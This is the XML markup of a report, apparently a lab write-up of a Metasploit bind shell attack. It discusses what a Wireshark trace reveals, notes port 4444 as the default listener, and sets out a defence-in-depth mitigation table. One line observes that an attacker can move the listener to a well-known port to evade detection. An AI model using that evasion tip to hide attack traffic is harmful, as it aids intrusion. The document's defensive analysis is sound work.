      <w:r w:rsidR="00775581">
        <w:t>the network engineer would be uncertain as to what this traffic was</w:t>
      </w:r>
      <w:r w:rsidR="001E785B">
        <w:t>, as</w:t>
      </w:r>
      <w:r w:rsidR="00775581">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E955F5">
        <w:t>this traffic would not be associated with video stream</w:t>
      </w:r>
      <w:r w:rsidR="007056BB">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="008F6D01">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002A5B9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D596B">
        <w:t xml:space="preserve">It appears </w:t>
      </w:r>
      <w:r w:rsidR="001E785B">
        <w:t xml:space="preserve">from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E785B">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E785B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E785B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">trace </w:t>
      </w:r>
      <w:r w:rsidR="000D596B">
        <w:t xml:space="preserve">that the traffic is also encrypted between the Attacker and Target pc, this would make </w:t>
      </w:r>
      <w:r w:rsidR="00A93954">
        <w:t>identification much more difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754FE972" w14:textId="59C11CFE" w:rsidR="00B6691C" w:rsidRDefault="00A93954" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The only</w:t>
      </w:r>
      <w:r w:rsidR="004722B9">
        <w:t xml:space="preserve"> give away would have been that port 4444 was in use and is </w:t>
      </w:r>
      <w:r w:rsidR="00897897">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="004722B9">
        <w:t>unofficial default</w:t>
      </w:r>
      <w:r w:rsidR="00897897">
        <w:t xml:space="preserve"> listener port for </w:t>
      </w:r>
      <w:r w:rsidR="006174A0">
        <w:t>MSF</w:t>
      </w:r>
      <w:r w:rsidR="00897897">
        <w:t>.  However, it should be noted that</w:t>
      </w:r>
      <w:r w:rsidR="00564018">
        <w:t xml:space="preserve"> the listener port</w:t>
      </w:r>
      <w:r w:rsidR="00897897">
        <w:t xml:space="preserve"> can be </w:t>
      </w:r>
      <w:r w:rsidR="00A37AED">
        <w:t xml:space="preserve">selected by the attacker so could be configured </w:t>
      </w:r>
      <w:r w:rsidR="00F225D5">
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidR="00A37AED">
        <w:t xml:space="preserve">another </w:t>
      </w:r>
      <w:r w:rsidR="00FB5B99">
        <w:t>well-known</w:t>
      </w:r>
      <w:r w:rsidR="00A37AED">
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r w:rsidR="003C5836">
        <w:t>, that would be more difficult to detect.</w:t>
      </w:r>
      <w:r w:rsidR="004722B9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FEF5C5" w14:textId="151B800E" w:rsidR="00D4212F" w:rsidRDefault="00391082" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>From this trace</w:t>
      </w:r>
      <w:r w:rsidR="009C7A56">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="002D3F40">
        <w:t xml:space="preserve">he only information that the IT technician </w:t>
      </w:r>
      <w:r w:rsidR="00711D54">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="002D3F40">
        <w:t xml:space="preserve">ould be able to find would be the Source and Destination IP Addresses and Port </w:t>
      </w:r>
      <w:r w:rsidR="00AE347C">
        <w:t>numbers,</w:t>
      </w:r>
      <w:r w:rsidR="002D3F40">
        <w:t xml:space="preserve"> and the amount of traffic being </w:t>
      </w:r>
      <w:r w:rsidR="005728A6">
        <w:t xml:space="preserve">transferred.  This </w:t>
      </w:r>
      <w:r w:rsidR="001155D8">
        <w:t>would make it intentionally more difficult for the IT technician to identity this traffic and they would need to investigate t</w:t>
      </w:r>
      <w:r w:rsidR="005728A6">
        <w:t>his incident further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C1047" w14:textId="77777777" w:rsidR="008D332F" w:rsidRDefault="008D332F" w:rsidP="008D332F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigation Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1F34A" w14:textId="4F128E49" w:rsidR="00624138" w:rsidRDefault="00E82204" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidR="00690B21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D3EC9">
        <w:t xml:space="preserve">prevent </w:t>
      </w:r>
      <w:r w:rsidR="00145002">
        <w:t>cybersecurity</w:t>
      </w:r>
      <w:r w:rsidR="006D3EC9">
        <w:t xml:space="preserve"> attacks it is highly recommended to use a </w:t>
      </w:r>
      <w:r w:rsidR="00145002">
        <w:t>defence</w:t>
      </w:r>
      <w:r w:rsidR="006D3EC9">
        <w:t xml:space="preserve"> in depth approach, as</w:t>
      </w:r>
      <w:r w:rsidR="00624138">
        <w:t xml:space="preserve"> this will make an attack far more difficult for the malicious hacker</w:t>
      </w:r>
      <w:r w:rsidR="002D7FB7">
        <w:t xml:space="preserve"> also if</w:t>
      </w:r>
      <w:r w:rsidR="006D3EC9">
        <w:t xml:space="preserve"> one single </w:t>
      </w:r>
      <w:r w:rsidR="00145002">
        <w:t xml:space="preserve">security device </w:t>
      </w:r>
      <w:r w:rsidR="002D7FB7">
        <w:t xml:space="preserve">were </w:t>
      </w:r>
      <w:r w:rsidR="00E3398A">
        <w:t>to develop</w:t>
      </w:r>
      <w:r w:rsidR="00624138">
        <w:t xml:space="preserve"> a vulnerability or become compromised</w:t>
      </w:r>
      <w:r w:rsidR="002D7FB7">
        <w:t xml:space="preserve"> then it wouldn’t mean a complete breach of security</w:t>
      </w:r>
      <w:r w:rsidR="00624138">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633C867" w14:textId="35F01855" w:rsidR="008D332F" w:rsidRDefault="002D7FB7" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The proposed mitigations below either</w:t>
      </w:r>
      <w:r w:rsidR="002B04D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00690B21">
        <w:t xml:space="preserve">prevent a </w:t>
      </w:r>
      <w:r w:rsidR="00536B65">
        <w:t>bind shell attack from being carried out</w:t>
      </w:r>
      <w:r w:rsidR="002B04D6">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r w:rsidR="002B04D6">
        <w:t xml:space="preserve"> assist in the event of a successful attack</w:t>
      </w:r>
      <w:r w:rsidR="00E82204">
        <w:t>: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D83BD1B" w14:textId="1264741F" w:rsidR="00A630D1" w:rsidRDefault="00A630D1" w:rsidP="00A630D1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc150084814"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Mitigation Items to prevent or assist with a cybersecurity attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidR="00F36792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C0E3F" w14:paraId="00D8CA4C" w14:textId="77777777" w:rsidTr="006D1358">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="16A7CB19" w14:textId="12485650" w:rsidR="009C0E3F" w:rsidRPr="006D1358" w:rsidRDefault="008E79FD" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D1358">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="3E2732E8" w14:textId="56EC8F0F" w:rsidR="009C0E3F" w:rsidRPr="006D1358" w:rsidRDefault="008E79FD" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D1358">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C0E3F" w14:paraId="063F914C" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63DA22AC" w14:textId="3EBAF833" w:rsidR="009C0E3F" w:rsidRDefault="009C0E3F" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cyber security awareness training </w:t>
            </w:r>
            <w:r w:rsidR="00B04708">
              <w:t>for end users</w:t>
            </w:r>
            <w:r w:rsidR="00D336FD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42710E54" w14:textId="100DEECC" w:rsidR="009C0E3F" w:rsidRDefault="007964F5" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">To ensure staff are made aware of SPAM and phishing emails, and </w:t>
            </w:r>
            <w:r w:rsidR="00930C28">
              <w:t xml:space="preserve">that they are advised </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">not to </w:t>
            </w:r>
            <w:r w:rsidR="00930C28">
              <w:t>click on links in email</w:t>
            </w:r>
            <w:r w:rsidR="00272184">
              <w:t xml:space="preserve"> or open attachments from unknown sources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062501A" w14:paraId="1F1EC21D" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="760CB42A" w14:textId="77777777" w:rsidR="0062501A" w:rsidRDefault="0062501A" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Installation of Stateful Firewalls </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26AFC856" w14:textId="2E4DB45A" w:rsidR="0062501A" w:rsidRDefault="0062501A" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>(Next Generation Firewalls)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A54397" w14:textId="69156BAA" w:rsidR="0062501A" w:rsidRDefault="0062501A" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">These firewalls can </w:t>
            </w:r>
            <w:r w:rsidR="00213D61">
              <w:t xml:space="preserve">monitor traffic and </w:t>
            </w:r>
            <w:r w:rsidR="0008447B">
              <w:t xml:space="preserve">detect suspicious activity. </w:t>
            </w:r>
            <w:r w:rsidR="00803D8F">
              <w:t xml:space="preserve">They can also </w:t>
            </w:r>
            <w:r w:rsidR="00621F65">
              <w:t>have</w:t>
            </w:r>
            <w:r w:rsidR="00803D8F">
              <w:t xml:space="preserve"> Unified Threat Management (UTM)</w:t>
            </w:r>
            <w:r w:rsidR="00621F65">
              <w:t xml:space="preserve"> capabilities</w:t>
            </w:r>
            <w:r w:rsidR="00220160">
              <w:t xml:space="preserve"> that can carry out content and web filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4288C" w14:paraId="292865AD" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C7C3489" w14:textId="25D09099" w:rsidR="00E4288C" w:rsidRDefault="00E4288C" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ensuring that </w:t>
            </w:r>
            <w:r w:rsidR="00B04708">
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidR="00A66F1E">
              <w:t>nsecure</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> devices are removed from the network</w:t>
            </w:r>
            <w:r w:rsidR="00D336FD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F856D8" w14:textId="3BFBF593" w:rsidR="00E4288C" w:rsidRDefault="00A66F1E" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>This would include PCs with outdate</w:t>
            </w:r>
            <w:r w:rsidR="00C8342A">
              <w:t>d and vulnerable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Operating systems (OS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C0E3F" w14:paraId="7BF37D96" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D57B30" w14:textId="623F7BD2" w:rsidR="009C0E3F" w:rsidRDefault="009C0E3F" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Patching Regime</w:t>
            </w:r>
            <w:r w:rsidR="00D336FD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73E38F0B" w14:textId="7674BA73" w:rsidR="009C0E3F" w:rsidRDefault="00C237A5" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ensuring that the Operating System and </w:t>
            </w:r>
            <w:r w:rsidR="00046E7E">
              <w:t>installed programmes are</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00046E7E">
              <w:t>up to date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C237A5" w14:paraId="4399E18C" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A1A45C" w14:textId="25E7D147" w:rsidR="00C237A5" w:rsidRDefault="00046E7E" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Install an Endpoint </w:t>
            </w:r>
            <w:r w:rsidR="00E207A7">
              <w:t>Detection and Response (EDR) tool</w:t>
            </w:r>
            <w:r w:rsidR="003B1598">
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="00D336FD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="322B5648" w14:textId="2FD58FC3" w:rsidR="00C237A5" w:rsidRDefault="00E207A7" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">EDR tools can be used to protect the PC from </w:t>
            </w:r>
            <w:r w:rsidR="00E70494">
              <w:t>threats such as those posed by MSF.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C237A5" w14:paraId="10A7BFC0" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D41FCF7" w14:textId="1106E398" w:rsidR="00C237A5" w:rsidRDefault="00E70494" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Ensure that security settings are configured on the PC</w:t>
            </w:r>
            <w:r w:rsidR="00CA3B2A">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07923FD7" w14:textId="5B55050E" w:rsidR="00C237A5" w:rsidRDefault="00CA3B2A" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">To ensure that Windows Defender Real Time protection and </w:t>
            </w:r>
            <w:r w:rsidR="00E4288C">
              <w:t>firewalls are enabled on PCs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B1598" w14:paraId="0C3E293F" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47800551" w14:textId="3BF1D7A2" w:rsidR="003B1598" w:rsidRDefault="003B1598" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Enable Microsoft</w:t>
            </w:r>
            <w:r w:rsidR="00C50492">
              <w:t xml:space="preserve"> (MS)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Advanced Threat Protection (ATP)</w:t>
            </w:r>
            <w:r w:rsidR="00C50492">
              <w:t xml:space="preserve"> and MS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> safe links</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1558D709" w14:textId="63717FD8" w:rsidR="003B1598" w:rsidRDefault="008B3E24" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">This would filter the users </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>emails, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> would ensure that if the user clicked on a link that it</w:t>
            </w:r>
            <w:r w:rsidR="001055A1">
              <w:t xml:space="preserve"> is safe before it is opened on the PC.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00920FCD" w14:paraId="45B6A91B" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A719F9D" w14:textId="7BBC8209" w:rsidR="00920FCD" w:rsidRDefault="00920FCD" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>System Hardening</w:t>
            </w:r>
            <w:r w:rsidR="00D336FD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34052DB1" w14:textId="2A40AE54" w:rsidR="00920FCD" w:rsidRDefault="00920FCD" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Disabling Ports and services that are not required, ensuring that only secure protocols are in use.</w:t>
            </w:r>
            <w:r w:rsidR="00580DFD">
              <w:t xml:space="preserve">  Disabling unencrypted protocols.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C0E3F" w14:paraId="60BB1D95" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4725CAF8" w14:textId="09D5871D" w:rsidR="009C0E3F" w:rsidRDefault="009C0E3F" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability scanning</w:t>
            </w:r>
            <w:r w:rsidR="00D336FD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF8C965" w14:textId="77777777" w:rsidR="009C0E3F" w:rsidRDefault="00E82204" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Running regular vulnerability scans on the network will highlight any systems that have </w:t>
            </w:r>
            <w:r w:rsidR="001F08F1">
              <w:t>insecure protocols enabled and</w:t>
            </w:r>
            <w:r w:rsidR="00DA02AB">
              <w:t xml:space="preserve"> would provide a report of any systems that</w:t>
            </w:r>
            <w:r w:rsidR="001F08F1">
              <w:t xml:space="preserve"> require patching</w:t>
            </w:r>
            <w:r w:rsidR="00D71B75">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00DA02AB">
              <w:t xml:space="preserve"> This report would provide a list </w:t>
            </w:r>
            <w:r w:rsidR="006B0D64">
              <w:t xml:space="preserve">of devices and give a vulnerability score against them using the Common </w:t>
            </w:r>
            <w:r w:rsidR="00C34D71">
              <w:t>Vulnerability Scoring System (CVSS)</w:t>
            </w:r>
            <w:r w:rsidR="006B0D64">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00D71B75">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FE86017" w14:textId="1E5AE8A3" w:rsidR="00C8342A" w:rsidRDefault="00C8342A" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">This could also be used to find </w:t>
            </w:r>
            <w:r w:rsidR="002C09A8">
              <w:t>rogue devices on the network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C0E3F" w14:paraId="3671110A" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="056AC50F" w14:textId="39F1AF93" w:rsidR="009C0E3F" w:rsidRDefault="00460AAA" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Implementation of Intrusion Detection and Prevention systems</w:t>
            </w:r>
            <w:r w:rsidR="00A82697">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C168173" w14:textId="1DF096D3" w:rsidR="009C0E3F" w:rsidRDefault="00A82697" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>These can be deployed on the network or on the host itself and would be able to detect suspicious activity</w:t>
            </w:r>
            <w:r w:rsidR="007E43B8">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C0E3F" w14:paraId="2D7504E7" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AA774A4" w14:textId="5FAD101E" w:rsidR="009C0E3F" w:rsidRDefault="00C34D71" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Physical Security of Comms and Server rooms</w:t>
            </w:r>
            <w:r w:rsidR="00D336FD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75328068" w14:textId="3498AECA" w:rsidR="009C0E3F" w:rsidRDefault="00C34D71" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ensuring that only </w:t>
            </w:r>
            <w:r w:rsidR="000B4EED">
              <w:t>authorised personnel have access to these critical locations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB14B4" w14:paraId="612EB91B" w14:textId="77777777" w:rsidTr="009C0E3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="299BD129" w14:textId="27360DD1" w:rsidR="00CB14B4" w:rsidRDefault="00CB14B4" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Ensuring that an Incident Response (IR) Plan is in place</w:t>
            </w:r>
            <w:r w:rsidR="000C658A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1199276156"/>
                <w:citation/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="000C658A">
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="000C658A">
                  <w:instrText xml:space="preserve"> CITATION NCS23IR \l 2057 </w:instrText>
                </w:r>
                <w:r w:rsidR="000C658A">
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="000C658A" w:rsidRPr="000C658A">
                  <w:rPr>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>[8]</w:t>
                </w:r>
                <w:r w:rsidR="000C658A">
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54E7D5E4" w14:textId="77777777" w:rsidR="00CB14B4" w:rsidRDefault="00CB14B4" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Preparation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA9394B" w14:textId="77777777" w:rsidR="00CB14B4" w:rsidRDefault="00CB14B4" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Identification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D33BBDC" w14:textId="77777777" w:rsidR="00CB14B4" w:rsidRDefault="00CB14B4" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Containment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A79C825" w14:textId="77777777" w:rsidR="00CB14B4" w:rsidRDefault="00CB14B4" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Eradication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C897969" w14:textId="77777777" w:rsidR="00CB14B4" w:rsidRDefault="00CB14B4" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Recovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B3C8E4" w14:textId="552A9D8C" w:rsidR="00CB14B4" w:rsidRDefault="00CB14B4" w:rsidP="00796962">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Lessons Learned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
